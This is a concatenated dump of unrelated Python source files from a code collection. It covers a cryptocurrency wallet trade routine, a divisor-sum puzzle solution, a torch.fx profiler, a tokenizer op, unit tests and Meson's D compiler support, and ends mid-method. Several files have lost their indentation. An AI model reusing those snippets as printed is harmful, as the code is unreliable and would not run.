inner_puzzle = await self.get_inner_puzzle_for_puzzle_hash(coloured_coin.puzzle_hash)
assert inner_puzzle is not None
sigs = await wallets[colour].get_sigs(inner_puzzle, inner_solution, coloured_coin.name())
sigs.append(aggsig)
aggsig = AugSchemeMPL.aggregate(sigs)
lineage_proof = await wallets[colour].get_lineage_proof_for_coin(coloured_coin)
spendable_cc_list.append(SpendableCC(coloured_coin, genesis_id, inner_puzzle, lineage_proof))
innersol_list.append(inner_solution)
# Create SpendableCC for each of the coloured coins received
for cc_coinsol_out in cc_coinsol_outamounts[colour]:
cc_coinsol = cc_coinsol_out[0]
puzzle = Program.from_bytes(bytes(cc_coinsol.puzzle_reveal))
solution = Program.from_bytes(bytes(cc_coinsol.solution))
r = uncurry_cc(puzzle)
if r:
mod_hash, genesis_coin_checker, inner_puzzle = r
inner_solution = solution.first()
lineage_proof = solution.rest().rest().first()
spendable_cc_list.append(SpendableCC(cc_coinsol.coin, genesis_id, inner_puzzle, lineage_proof))
innersol_list.append(inner_solution)
# Finish the output coin SpendableCC with new information
newinnerpuzhash = await wallets[colour].get_new_inner_hash()
outputamount = sum([c.amount for c in my_cc_spends]) + cc_discrepancies[colour] + my_output_coin.amount
inner_solution = self.wallet_state_manager.main_wallet.make_solution(
primaries=[{"puzzlehash": newinnerpuzhash, "amount": outputamount}]
)
inner_puzzle = await self.get_inner_puzzle_for_puzzle_hash(my_output_coin.puzzle_hash)
assert inner_puzzle is not None
lineage_proof = await wallets[colour].get_lineage_proof_for_coin(my_output_coin)
spendable_cc_list.append(SpendableCC(my_output_coin, genesis_id, inner_puzzle, lineage_proof))
innersol_list.append(inner_solution)
sigs = await wallets[colour].get_sigs(inner_puzzle, inner_solution, my_output_coin.name())
sigs.append(aggsig)
aggsig = AugSchemeMPL.aggregate(sigs)
if spend_bundle is None:
spend_bundle = spend_bundle_for_spendable_ccs(
CC_MOD,
Program.from_bytes(bytes.fromhex(colour)),
spendable_cc_list,
innersol_list,
[aggsig],
)
else:
new_spend_bundle = spend_bundle_for_spendable_ccs(
CC_MOD,
Program.from_bytes(bytes.fromhex(colour)),
spendable_cc_list,
innersol_list,
[aggsig],
)
spend_bundle = SpendBundle.aggregate([spend_bundle, new_spend_bundle])
# reset sigs and aggsig so that they aren't included next time around
sigs = []
aggsig = AugSchemeMPL.aggregate(sigs)
my_tx_records = []
if zero_spend_list is not None and spend_bundle is not None:
zero_spend_list.append(spend_bundle)
spend_bundle = SpendBundle.aggregate(zero_spend_list)
if spend_bundle is None:
return False, None, "spend_bundle missing"
# Add transaction history for this trade
now = uint64(int(time.time()))
if dogechia_spend_bundle is not None:
spend_bundle = SpendBundle.aggregate([spend_bundle, dogechia_spend_bundle])
if dogechia_discrepancy < 0:
tx_record = TransactionRecord(
confirmed_at_height=uint32(0),
created_at_time=now,
to_puzzle_hash=token_bytes(),
amount=uint64(abs(dogechia_discrepancy)),
fee_amount=uint64(0),
confirmed=False,
sent=uint32(10),
spend_bundle=dogechia_spend_bundle,
additions=dogechia_spend_bundle.additions(),
removals=dogechia_spend_bundle.removals(),
wallet_id=uint32(1),
sent_to=[],
trade_id=std_hash(spend_bundle.name() + bytes(now)),
type=uint32(TransactionType.OUTGOING_TRADE.value),
name=dogechia_spend_bundle.name(),
)
else:
tx_record = TransactionRecord(
confirmed_at_height=uint32(0),
created_at_time=uint64(int(time.time())),
to_puzzle_hash=token_bytes(),
amount=uint64(abs(dogechia_discrepancy)),
fee_amount=uint64(0),
confirmed=False,
sent=uint32(10),
spend_bundle=dogechia_spend_bundle,
additions=dogechia_spend_bundle.additions(),
removals=dogechia_spend_bundle.removals(),
wallet_id=uint32(1),
sent_to=[],
trade_id=std_hash(spend_bundle.name() + bytes(now)),
type=uint32(TransactionType.INCOMING_TRADE.value),
name=dogechia_spend_bundle.name(),
)
my_tx_records.append(tx_record)
for colour, amount in cc_discrepancies.items():
wallet = wallets[colour]
if dogechia_discrepancy > 0:
tx_record = TransactionRecord(
confirmed_at_height=uint32(0),
created_at_time=uint64(int(time.time())),
to_puzzle_hash=token_bytes(),
amount=uint64(abs(amount)),
fee_amount=uint64(0),
confirmed=False,
sent=uint32(10),
spend_bundle=spend_bundle,
additions=spend_bundle.additions(),
removals=spend_bundle.removals(),
wallet_id=wallet.id(),
sent_to=[],
trade_id=std_hash(spend_bundle.name() + bytes(now)),
type=uint32(TransactionType.OUTGOING_TRADE.value),
name=spend_bundle.name(),
)
else:
tx_record = TransactionRecord(
confirmed_at_height=uint32(0),
created_at_time=uint64(int(time.time())),
to_puzzle_hash=token_bytes(),
amount=uint64(abs(amount)),
fee_amount=uint64(0),
confirmed=False,
sent=uint32(10),
spend_bundle=spend_bundle,
additions=spend_bundle.additions(),
removals=spend_bundle.removals(),
wallet_id=wallet.id(),
sent_to=[],
trade_id=std_hash(spend_bundle.name() + bytes(now)),
type=uint32(TransactionType.INCOMING_TRADE.value),
name=token_bytes(),
)
my_tx_records.append(tx_record)
tx_record = TransactionRecord(
confirmed_at_height=uint32(0),
created_at_time=uint64(int(time.time())),
to_puzzle_hash=token_bytes(),
amount=uint64(0),
fee_amount=uint64(0),
confirmed=False,
sent=uint32(0),
spend_bundle=spend_bundle,
additions=spend_bundle.additions(),
removals=spend_bundle.removals(),
wallet_id=uint32(0),
sent_to=[],
trade_id=std_hash(spend_bundle.name() + bytes(now)),
type=uint32(TransactionType.OUTGOING_TRADE.value),
name=spend_bundle.name(),
)
now = uint64(int(time.time()))
trade_record: TradeRecord = TradeRecord(
confirmed_at_index=uint32(0),
accepted_at_time=now,
created_at_time=now,
my_offer=False,
sent=uint32(0),
spend_bundle=offer_spend_bundle,
tx_spend_bundle=spend_bundle,
additions=spend_bundle.additions(),
removals=spend_bundle.removals(),
trade_id=std_hash(spend_bundle.name() + bytes(now)),
status=uint32(TradeStatus.PENDING_CONFIRM.value),
sent_to=[],
)
await self.save_trade(trade_record)
await self.wallet_state_manager.add_pending_transaction(tx_record)
for tx in my_tx_records:
await self.wallet_state_manager.add_transaction(tx)
return True, trade_record, None
|
py | 1a37c1e64f7abf6ced5facbf68cbcf32076821ef | def buddy(start, limit):
    # look for a buddy pair (n, m): s(n) = m + 1 and s(m) = n + 1,
    # where s is the proper-divisor sum computed by prime() below
    for i in range(start, limit):
        res = prime(i)            # res = s(i); candidate partner is m = res - 1
        if res > i:
            res2 = prime(res - 1)
            if (res2 - i) == 1:   # s(m) == i + 1
                return [i, res - 1]
    return "Nothing"
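# Example (a known buddy pair): buddy(10, 50) -> [48, 75], since
# s(48) = 1+2+3+4+6+8+12+16+24 = 76 = 75 + 1 and s(75) = 1+3+5+15+25 = 49 = 48 + 1.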
def prime(n):
    # despite its name, this returns the sum of the proper divisors of n,
    # collected in pairs (i, n // i) up to sqrt(n), starting from 1
    total = 1
    for i in range(2, int(n**0.5) + 1):
        if n % i == 0:
            total += i
            if i == n // i:   # perfect square: count the root only once
                continue
            total += n // i
return total |
py | 1a37c271979d17b602bf6455193078c9d2fba6d3 | from typing import Any
import torch
from torch import fx
class NodeProfiler(fx.Interpreter):
"""
This is basically a variant of shape prop in
https://github.com/pytorch/pytorch/blob/74849d9188de30d93f7c523d4eeceeef044147a9/torch/fx/passes/shape_prop.py#L65.
Instead of propagating just the shape, we record all the intermediate node Tensor values.
This is useful to debug some of lowering pass issue where we want to check a specific
tensor value. Note that output value can be tuple(Tensor) as well as Tensor.
"""
def __init__(self, module: fx.GraphModule):
super().__init__(module)
self.execution_time = {}
self.node_map = {}
self.iter = 100
def run_node(self, n: fx.Node) -> Any:
result = super().run_node(n)
if n.op not in {"call_function", "call_method", "call_module"}:
return result
torch.cuda.synchronize()
start_event = torch.cuda.Event(enable_timing=True)
end_event = torch.cuda.Event(enable_timing=True)
start_event.record()
for _ in range(self.iter):
result = super().run_node(n)
end_event.record()
torch.cuda.synchronize()
self.execution_time[f"{n.name}"] = (
start_event.elapsed_time(end_event) / self.iter
)
self.node_map[n.name] = n
return result
def propagate(self, *args):
"""
Run `module` via interpretation and return the result and
record the shape and type of each node.
Args:
*args (Tensor): the sample input.
Returns:
Any: The value returned from executing the Module
"""
return super().run(*args)
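# A minimal usage sketch (module and input names here are illustrative):
#
#     gm = torch.fx.symbolic_trace(my_module)
#     profiler = NodeProfiler(gm)
#     profiler.propagate(sample_input.cuda())
#     for name, ms in sorted(profiler.execution_time.items(), key=lambda kv: -kv[1]):
#         print(f"{name}: {ms:.3f} ms ({profiler.node_map[name].op})")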
|
py | 1a37c29cd460ee60aeed08d01ea052fbaaa4670e | print(ord(input())-64)
|
py | 1a37c3698bdbae5da35fa55ab31bc9d0d1c594c0 | # Custom imports
from .semi_epoch_based_runner import SemiEpochBasedRunner
|
py | 1a37c4a13fedc8747fa577f3332b61c5c3f5b71a | import unicodedata
from .add_whitespace_around_character import AddWhitespaceAroundCharacter
class AddWhitespaceAroundPunctuation(AddWhitespaceAroundCharacter):
"""
Recognize punctuation characters and add whitespace around each punctuation character
E.g.
>>> from uttut.pipeline.ops.add_whitespace_around_punctuation import (
AddWhitespaceAroundPunctuation)
>>> op = AddWhitespaceAroundPunctuation()
>>> output_seq, label_aligner = op.transform("GB,薄餡亂入")
>>> output_labels = label_aligner.transform([1, 1, 2, 3, 3, 4, 5])
>>> output_seq
"GB , 薄餡亂入"
>>> output_labels
[1, 1, 0, 2, 0, 3, 3, 4, 5]
>>> label_aligner.inverse_transform(output_labels)
[1, 1, 2, 3, 3, 4, 5]
"""
def _is_valid_char(self, char: str) -> bool:
return is_punctuation(char)
def is_punctuation(char: str) -> bool:
"""Check whether char is a punctuation character.
This code is copied from Bert `tokenization.py`.
We treat all non-letter/number ASCII as punctuation.
Characters such as "^", "$", and "`" are not in the Unicode
Punctuation class but we treat them as punctuation anyways, for
consistency.
"""
code_point = ord(char)
    # ASCII punctuation blocks: 33-47 (!"#$%&'()*+,-./), 58-64 (:;<=>?@),
    # 91-96 ([\]^_`) and 123-126 ({|}~)
    if (33 <= code_point <= 47 or 58 <= code_point <= 64
            or 91 <= code_point <= 96 or 123 <= code_point <= 126):
        return True
cat = unicodedata.category(char)
# For more details, please take a look at
# https://www.fileformat.info/info/unicode/category/index.htm
if cat.startswith("P"):
return True
return False
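# e.g. is_punctuation(",") -> True; is_punctuation("^") -> True (ASCII fallback);
# is_punctuation("薄") -> False (Unicode category Lo, not P*)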
|
py | 1a37c55ec2e92d11352b8f040612c27d275994a3 | """
Unit tests for Unified/Monitor.py module
Author: Valentin Kuznetsov <vkuznet [AT] gmail [DOT] com>
"""
from __future__ import division, print_function
import time
# system modules
import unittest
from copy import deepcopy
# WMCore modules
from WMCore.MicroService.Unified.MSMonitor import MSMonitor
from WMQuality.Emulators.EmulatedUnitTestCase import EmulatedUnitTestCase
from WMQuality.Emulators.ReqMgrAux.MockReqMgrAux import MockReqMgrAux
class MSMonitorTest(EmulatedUnitTestCase):
"Unit test for Monitor module"
def setUp(self):
"init test class"
self.msConfig = {'verbose': False,
'group': 'DataOps',
'interval': 1 * 60,
'updateInterval': 0,
'enableStatusTransition': True,
'reqmgr2Url': 'https://cmsweb-testbed.cern.ch/reqmgr2',
'reqmgrCacheUrl': 'https://cmsweb-testbed.cern.ch/couchdb/reqmgr_workload_cache',
'phedexUrl': 'https://cmsweb-testbed.cern.ch/phedex/datasvc/json/prod',
'dbsUrl': 'https://cmsweb-testbed.cern.ch/dbs/int/global/DBSReader'}
self.ms = MSMonitor(self.msConfig)
self.ms.reqmgrAux = MockReqMgrAux()
super(MSMonitorTest, self).setUp()
def testUpdateCaches(self):
"""
Test the getCampaignConfig method
"""
campaigns, transfersDocs = self.ms.updateCaches()
self.assertNotEqual(transfersDocs, [])
self.assertEqual(len(transfersDocs[0]['transfers']), 1)
self.assertTrue(time.time() > transfersDocs[0]['lastUpdate'], 1)
self.assertNotEqual(campaigns, [])
for cname, cdict in campaigns.items():
self.assertEqual(cname, cdict['CampaignName'])
self.assertEqual(isinstance(cdict, dict), True)
self.assertNotEqual(cdict.get('CampaignName', {}), {})
def testGetTransferInfo(self):
"""
Test the getTransferInfo method
"""
_, transfersDocs = self.ms.updateCaches()
transfersDocs[0]['transfers'] = []
originalTransfers = deepcopy(transfersDocs)
self.ms.getTransferInfo(transfersDocs)
self.assertNotEqual(transfersDocs, [])
self.assertEqual(len(transfersDocs), len(originalTransfers))
for rec in transfersDocs:
self.assertEqual(isinstance(rec, dict), True)
keys = sorted(['workflowName', 'lastUpdate', 'transfers'])
self.assertEqual(keys, sorted(rec.keys()))
self.assertTrue(time.time() >= rec['lastUpdate'])
def testCompletion(self):
"""
Test the completion method
"""
campaigns, transfersDocs = self.ms.updateCaches()
transfersDocs.append(deepcopy(transfersDocs[0]))
transfersDocs.append(deepcopy(transfersDocs[0]))
transfersDocs[0]['transfers'] = []
transfersDocs[0]['workflowName'] = 'workflow_0'
transfersDocs[1]['transfers'][0]['completion'].append(100)
transfersDocs[1]['workflowName'] = 'workflow_1'
transfersDocs[2]['workflowName'] = 'workflow_2'
self.assertEqual(len(transfersDocs), 3)
completedWfs = self.ms.getCompletedWorkflows(transfersDocs, campaigns)
self.assertEqual(len(completedWfs), 2)
def testUpdateTransferInfo(self):
"""
Test the updateTransferInfo method
"""
_, transferRecords = self.ms.updateCaches()
failed = self.ms.updateTransferDocs(transferRecords)
self.assertEqual(len(failed), len(transferRecords))
if __name__ == '__main__':
unittest.main()
|
py | 1a37c56a60c5c84a073359fbe7b52787d2d426ef | # Copyright (c) 2012 - 2015 Lars Hupfeldt Nielsen, Hupfeldt IT
# All rights reserved. This work is under a BSD license, see LICENSE.TXT.
from pytest import raises
from jenkinsflow.flow import parallel, serial, FlowScopeException
from .framework import api_select
def test_flow_scope_job(api_type):
with api_select.api(__file__, api_type) as api:
api.flow_job()
api.job('j1', max_fails=0, expect_invocations=0, expect_order=None)
api.job('j2', max_fails=0, expect_invocations=0, expect_order=None)
with raises(FlowScopeException):
with serial(api, 10, job_name_prefix=api.job_name_prefix) as ctrl1:
pass
ctrl1.invoke('j1')
with raises(FlowScopeException):
with parallel(api, 10, job_name_prefix=api.job_name_prefix) as ctrl1:
pass
ctrl1.invoke('j1')
with raises(FlowScopeException):
with serial(api, 10, job_name_prefix=api.job_name_prefix) as ctrl1:
with ctrl1.parallel() as ctrl2:
pass
ctrl2.invoke('j2')
with raises(FlowScopeException):
with parallel(api, 10, job_name_prefix=api.job_name_prefix) as ctrl1:
with ctrl1.serial() as ctrl2:
ctrl2.invoke('j1')
ctrl2.invoke('j2')
def test_flow_scope_serial(api_type):
with api_select.api(__file__, api_type) as api:
api.flow_job()
with raises(FlowScopeException):
with serial(api, 10, job_name_prefix=api.job_name_prefix) as ctrl1:
pass
with ctrl1.serial(1):
pass
with raises(FlowScopeException):
with serial(api, 10, job_name_prefix=api.job_name_prefix) as ctrl1:
pass
with ctrl1.parallel(1):
pass
with raises(FlowScopeException):
with serial(api, 10, job_name_prefix=api.job_name_prefix) as ctrl1:
with ctrl1.serial() as ctrl2:
ctrl2.serial(1)
ctrl2.serial(1)
with raises(FlowScopeException):
with serial(api, 10, job_name_prefix=api.job_name_prefix) as ctrl1:
with ctrl1.serial() as ctrl2:
ctrl1.serial(1)
def test_flow_scope_parallel(api_type):
with api_select.api(__file__, api_type) as api:
api.flow_job()
with raises(FlowScopeException):
with parallel(api, 10, job_name_prefix=api.job_name_prefix) as ctrl1:
pass
with ctrl1.parallel(1):
pass
with raises(FlowScopeException):
with parallel(api, 10, job_name_prefix=api.job_name_prefix) as ctrl1:
pass
with ctrl1.serial(1):
pass
with raises(FlowScopeException):
with parallel(api, 10, job_name_prefix=api.job_name_prefix) as ctrl1:
with ctrl1.parallel() as ctrl2:
ctrl2.parallel(1)
ctrl2.parallel(1)
with raises(FlowScopeException):
with parallel(api, 10, job_name_prefix=api.job_name_prefix) as ctrl1:
with ctrl1.parallel() as ctrl2:
ctrl1.parallel(1)
|
py | 1a37c634fac821321a52b897ee8d04d5ce73d590 | # Copyright 2012-2017 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os.path, subprocess
from ..mesonlib import (
EnvironmentException, MachineChoice, version_compare, is_windows, is_osx
)
from .compilers import (
CompilerType,
d_dmd_buildtype_args,
d_gdc_buildtype_args,
d_ldc_buildtype_args,
clike_debug_args,
Compiler,
CompilerArgs,
)
from .mixins.gnu import get_gcc_soname_args, gnu_color_args, gnu_optimization_args
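# Per-compiler-family flags used to enable D language features
# (unit tests, debug identifiers, version identifiers, string import dirs).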
d_feature_args = {'gcc': {'unittest': '-funittest',
'debug': '-fdebug',
'version': '-fversion',
'import_dir': '-J'
},
'llvm': {'unittest': '-unittest',
'debug': '-d-debug',
'version': '-d-version',
'import_dir': '-J'
},
'dmd': {'unittest': '-unittest',
'debug': '-debug',
'version': '-version',
'import_dir': '-J'
}
}
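# Maps of Meson optimization levels to the corresponding LDC/DMD flags.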
ldc_optimization_args = {'0': [],
'g': [],
'1': ['-O1'],
'2': ['-O2'],
'3': ['-O3'],
's': ['-Os'],
}
dmd_optimization_args = {'0': [],
'g': [],
'1': ['-O'],
'2': ['-O'],
'3': ['-O'],
's': ['-O'],
}
class DCompiler(Compiler):
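    # Linker flags selecting the MSVC C runtime variant, in LDC's -mscrtlib= syntax.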
mscrt_args = {
'none': ['-mscrtlib='],
'md': ['-mscrtlib=msvcrt'],
'mdd': ['-mscrtlib=msvcrtd'],
'mt': ['-mscrtlib=libcmt'],
'mtd': ['-mscrtlib=libcmtd'],
}
def __init__(self, exelist, version, for_machine: MachineChoice, arch, **kwargs):
self.language = 'd'
super().__init__(exelist, version, for_machine, **kwargs)
self.id = 'unknown'
self.arch = arch
def sanity_check(self, work_dir, environment):
source_name = os.path.join(work_dir, 'sanity.d')
output_name = os.path.join(work_dir, 'dtest')
with open(source_name, 'w') as ofile:
ofile.write('''void main() { }''')
pc = subprocess.Popen(self.exelist + self.get_output_args(output_name) + self.get_target_arch_args() + [source_name], cwd=work_dir)
pc.wait()
if pc.returncode != 0:
raise EnvironmentException('D compiler %s can not compile programs.' % self.name_string())
if subprocess.call(output_name) != 0:
raise EnvironmentException('Executables created by D compiler %s are not runnable.' % self.name_string())
def needs_static_linker(self):
return True
def name_string(self):
return ' '.join(self.exelist)
def get_exelist(self):
return self.exelist
def get_linker_exelist(self):
return self.exelist[:]
def get_output_args(self, target):
return ['-of=' + target]
def get_linker_output_args(self, target):
return ['-of=' + target]
def get_include_args(self, path, is_system):
return ['-I=' + path]
def compute_parameters_with_absolute_paths(self, parameter_list, build_dir):
for idx, i in enumerate(parameter_list):
if i[:3] == '-I=':
parameter_list[idx] = i[:3] + os.path.normpath(os.path.join(build_dir, i[3:]))
if i[:4] == '-L-L':
parameter_list[idx] = i[:4] + os.path.normpath(os.path.join(build_dir, i[4:]))
if i[:5] == '-L=-L':
parameter_list[idx] = i[:5] + os.path.normpath(os.path.join(build_dir, i[5:]))
if i[:6] == '-Wl,-L':
parameter_list[idx] = i[:6] + os.path.normpath(os.path.join(build_dir, i[6:]))
return parameter_list
def get_warn_args(self, level):
return ['-wi']
def get_werror_args(self):
return ['-w']
def get_dependency_gen_args(self, outtarget, outfile):
        # DMD and LDC do not currently return Makefile-compatible dependency info.
return []
def get_linker_search_args(self, dirname):
# -L is recognized as "add this to the search path" by the linker,
# while the compiler recognizes it as "pass to linker".
return ['-Wl,-L' + dirname]
def get_coverage_args(self):
return ['-cov']
def get_preprocess_only_args(self):
return ['-E']
def get_compile_only_args(self):
return ['-c']
def depfile_for_object(self, objfile):
return objfile + '.' + self.get_depfile_suffix()
def get_depfile_suffix(self):
return 'deps'
def get_pic_args(self):
if is_windows():
return []
return ['-fPIC']
def get_std_shared_lib_link_args(self):
return ['-shared']
def get_soname_args(self, *args):
# FIXME: Make this work for cross-compiling
if is_windows():
return []
elif is_osx():
soname_args = get_gcc_soname_args(CompilerType.GCC_OSX, *args)
if soname_args:
return ['-Wl,' + ','.join(soname_args)]
return []
return get_gcc_soname_args(CompilerType.GCC_STANDARD, *args)
def get_feature_args(self, kwargs, build_to_src):
res = []
if 'unittest' in kwargs:
unittest = kwargs.pop('unittest')
unittest_arg = d_feature_args[self.id]['unittest']
if not unittest_arg:
raise EnvironmentException('D compiler %s does not support the "unittest" feature.' % self.name_string())
if unittest:
res.append(unittest_arg)
if 'debug' in kwargs:
debug_level = -1
debugs = kwargs.pop('debug')
if not isinstance(debugs, list):
debugs = [debugs]
debug_arg = d_feature_args[self.id]['debug']
if not debug_arg:
raise EnvironmentException('D compiler %s does not support conditional debug identifiers.' % self.name_string())
            # Collect all debug identifiers and find the largest debug level
for d in debugs:
if isinstance(d, int):
if d > debug_level:
debug_level = d
elif isinstance(d, str) and d.isdigit():
if int(d) > debug_level:
debug_level = int(d)
else:
res.append('{0}={1}'.format(debug_arg, d))
if debug_level >= 0:
res.append('{0}={1}'.format(debug_arg, debug_level))
if 'versions' in kwargs:
version_level = -1
versions = kwargs.pop('versions')
if not isinstance(versions, list):
versions = [versions]
version_arg = d_feature_args[self.id]['version']
if not version_arg:
raise EnvironmentException('D compiler %s does not support conditional version identifiers.' % self.name_string())
            # Collect all version identifiers and find the largest version level
for v in versions:
if isinstance(v, int):
if v > version_level:
version_level = v
elif isinstance(v, str) and v.isdigit():
if int(v) > version_level:
version_level = int(v)
else:
res.append('{0}={1}'.format(version_arg, v))
if version_level >= 0:
res.append('{0}={1}'.format(version_arg, version_level))
if 'import_dirs' in kwargs:
import_dirs = kwargs.pop('import_dirs')
if not isinstance(import_dirs, list):
import_dirs = [import_dirs]
import_dir_arg = d_feature_args[self.id]['import_dir']
if not import_dir_arg:
raise EnvironmentException('D compiler %s does not support the "string import directories" feature.' % self.name_string())
for idir_obj in import_dirs:
basedir = idir_obj.get_curdir()
for idir in idir_obj.get_incdirs():
                    # Avoid a superfluous '/.' at the end of paths when idir is '.'
if idir not in ('', '.'):
expdir = os.path.join(basedir, idir)
else:
expdir = basedir
srctreedir = os.path.join(build_to_src, expdir)
res.append('{0}{1}'.format(import_dir_arg, srctreedir))
if kwargs:
raise EnvironmentException('Unknown D compiler feature(s) selected: %s' % ', '.join(kwargs.keys()))
return res
def get_buildtype_linker_args(self, buildtype):
if buildtype != 'plain':
return self.get_target_arch_args()
return []
def get_std_exe_link_args(self):
return []
def gen_import_library_args(self, implibname):
return ['-Wl,--out-implib=' + implibname]
def build_rpath_args(self, build_dir, from_dir, rpath_paths, build_rpath, install_rpath):
if is_windows():
return []
# This method is to be used by LDC and DMD.
# GDC can deal with the verbatim flags.
if not rpath_paths and not install_rpath:
return []
paths = ':'.join([os.path.join(build_dir, p) for p in rpath_paths])
if build_rpath != '':
paths += ':' + build_rpath
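        # Pad the rpath string up to the install rpath's length so it can be
        # patched in place at install time without relinking.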
if len(paths) < len(install_rpath):
padding = 'X' * (len(install_rpath) - len(paths))
if not paths:
paths = padding
else:
paths = paths + ':' + padding
return ['-Wl,-rpath,{}'.format(paths)]
def _get_compiler_check_args(self, env, extra_args, dependencies, mode='compile'):
if callable(extra_args):
extra_args = extra_args(mode)
if extra_args is None:
extra_args = []
elif isinstance(extra_args, str):
extra_args = [extra_args]
if dependencies is None:
dependencies = []
elif not isinstance(dependencies, list):
dependencies = [dependencies]
# Collect compiler arguments
args = CompilerArgs(self)
for d in dependencies:
# Add compile flags needed by dependencies
args += d.get_compile_args()
if mode == 'link':
# Add link flags needed to find dependencies
args += d.get_link_args()
if mode == 'compile':
# Add DFLAGS from the env
args += env.coredata.get_external_args(self.for_machine, self.language)
elif mode == 'link':
# Add LDFLAGS from the env
args += env.coredata.get_external_link_args(self.for_machine, self.language)
# extra_args must override all other arguments, so we add them last
args += extra_args
return args
def compiles(self, code, env, *, extra_args=None, dependencies=None, mode='compile'):
args = self._get_compiler_check_args(env, extra_args, dependencies, mode)
with self.cached_compile(code, env.coredata, extra_args=args, mode=mode) as p:
return p.returncode == 0, p.cached
def has_multi_arguments(self, args, env):
return self.compiles('int i;\n', env, extra_args=args)
def get_target_arch_args(self):
        # LDC2 on Windows targets the current OS architecture by default, but
        # it should follow the target specified by the MSVC toolchain.
if is_windows():
if self.arch == 'x86_64':
return ['-m64']
return ['-m32']
return []
@classmethod
def translate_args_to_nongnu(cls, args):
dcargs = []
# Translate common arguments to flags the LDC/DMD compilers
# can understand.
# The flags might have been added by pkg-config files,
# and are therefore out of the user's control.
for arg in args:
# Translate OS specific arguments first.
osargs = []
if is_windows():
osargs = cls.translate_arg_to_windows(arg)
elif is_osx():
osargs = cls.translate_arg_to_osx(arg)
if osargs:
dcargs.extend(osargs)
continue
# Translate common D arguments here.
if arg == '-pthread':
continue
if arg.startswith('-fstack-protector'):
continue
if arg.startswith('-D'):
continue
if arg.startswith('-Wl,'):
# Translate linker arguments here.
linkargs = arg[arg.index(',') + 1:].split(',')
for la in linkargs:
dcargs.append('-L=' + la.strip())
continue
elif arg.startswith(('-link-defaultlib', '-linker', '-link-internally', '-linkonce-templates', '-lib')):
# these are special arguments to the LDC linker call,
# arguments like "-link-defaultlib-shared" do *not*
# denote a library to be linked, but change the default
# Phobos/DRuntime linking behavior, while "-linker" sets the
# default linker.
dcargs.append(arg)
continue
elif arg.startswith('-l'):
# translate library link flag
dcargs.append('-L=' + arg)
continue
elif arg.startswith('-isystem'):
# translate -isystem system include path
# this flag might sometimes be added by C library Cflags via
# pkg-config.
# NOTE: -isystem and -I are not 100% equivalent, so this is just
# a workaround for the most common cases.
if arg.startswith('-isystem='):
dcargs.append('-I=' + arg[9:])
                else:
                    # '-isystem<path>' with the path attached: keep the path
                    # instead of dropping it.
                    dcargs.append('-I=' + arg[8:])
continue
elif arg.startswith('-L/') or arg.startswith('-L./'):
# we need to handle cases where -L is set by e.g. a pkg-config
                # setting to select a linker search path. However, we cannot
                # unconditionally prefix '-L' with '-L' because the user might
# have set this flag too to do what it is intended to for this
# compiler (pass flag through to the linker)
# Hence, we guess here whether the flag was intended to pass
# a linker search path.
# Make sure static library files are passed properly to the linker.
if arg.endswith('.a') or arg.endswith('.lib'):
if arg.startswith('-L='):
farg = arg[3:]
else:
farg = arg[2:]
if len(farg) > 0 and not farg.startswith('-'):
dcargs.append('-L=' + farg)
continue
dcargs.append('-L=' + arg)
continue
elif not arg.startswith('-') and arg.endswith(('.a', '.lib')):
# ensure static libraries are passed through to the linker
dcargs.append('-L=' + arg)
continue
else:
dcargs.append(arg)
return dcargs
@classmethod
def translate_arg_to_windows(cls, arg):
args = []
if arg.startswith('-Wl,'):
# Translate linker arguments here.
linkargs = arg[arg.index(',') + 1:].split(',')
for la in linkargs:
if la.startswith('--out-implib='):
# Import library name
args.append('-L=/IMPLIB:' + la[13:].strip())
elif arg.startswith('-mscrtlib='):
args.append(arg)
mscrtlib = arg[10:].lower()
if cls is LLVMDCompiler:
# Default crt libraries for LDC2 must be excluded for other
# selected crt options.
if mscrtlib != 'libcmt':
args.append('-L=/NODEFAULTLIB:libcmt')
args.append('-L=/NODEFAULTLIB:libvcruntime')
# Fixes missing definitions for printf-functions in VS2017
if mscrtlib.startswith('msvcrt'):
args.append('-L=/DEFAULTLIB:legacy_stdio_definitions.lib')
return args
@classmethod
def translate_arg_to_osx(cls, arg):
args = []
if arg.startswith('-install_name'):
args.append('-L=' + arg)
return args
def get_debug_args(self, is_debug):
ddebug_args = []
if is_debug:
ddebug_args = [d_feature_args[self.id]['debug']]
return clike_debug_args[is_debug] + ddebug_args
def get_crt_args(self, crt_val, buildtype):
if not is_windows():
return []
if crt_val in self.mscrt_args:
return self.mscrt_args[crt_val]
assert(crt_val == 'from_buildtype')
# Match what build type flags used to do.
if buildtype == 'plain':
return []
elif buildtype == 'debug':
return self.mscrt_args['mdd']
elif buildtype == 'debugoptimized':
return self.mscrt_args['md']
elif buildtype == 'release':
return self.mscrt_args['md']
elif buildtype == 'minsize':
return self.mscrt_args['md']
else:
assert(buildtype == 'custom')
raise EnvironmentException('Requested C runtime based on buildtype, but buildtype is "custom".')
def get_crt_compile_args(self, crt_val, buildtype):
return []
def get_crt_link_args(self, crt_val, buildtype):
return []
def thread_link_flags(self, env):
return ['-pthread']
class GnuDCompiler(DCompiler):
def __init__(self, exelist, version, for_machine: MachineChoice, arch, **kwargs):
DCompiler.__init__(self, exelist, version, for_machine, arch, **kwargs)
self.id = 'gcc'
default_warn_args = ['-Wall', '-Wdeprecated']
self.warn_args = {'0': [],
'1': default_warn_args,
'2': default_warn_args + ['-Wextra'],
'3': default_warn_args + ['-Wextra', '-Wpedantic']}
self.base_options = ['b_colorout', 'b_sanitize', 'b_staticpic', 'b_vscrt']
self._has_color_support = version_compare(self.version, '>=4.9')
# dependencies were implemented before, but broken - support was fixed in GCC 7.1+
# (and some backported versions)
self._has_deps_support = version_compare(self.version, '>=7.1')
def get_colorout_args(self, colortype):
if self._has_color_support:
return gnu_color_args[colortype][:]
return []
def get_dependency_gen_args(self, outtarget, outfile):
if not self._has_deps_support:
return []
return ['-MD', '-MQ', outtarget, '-MF', outfile]
def get_output_args(self, target):
return ['-o', target]
def get_linker_output_args(self, target):
return ['-o', target]
def get_include_args(self, path, is_system):
return ['-I' + path]
def get_warn_args(self, level):
return self.warn_args[level]
def get_werror_args(self):
return ['-Werror']
def get_linker_search_args(self, dirname):
return ['-L' + dirname]
def get_coverage_args(self):
return []
def get_buildtype_args(self, buildtype):
return d_gdc_buildtype_args[buildtype]
def compute_parameters_with_absolute_paths(self, parameter_list, build_dir):
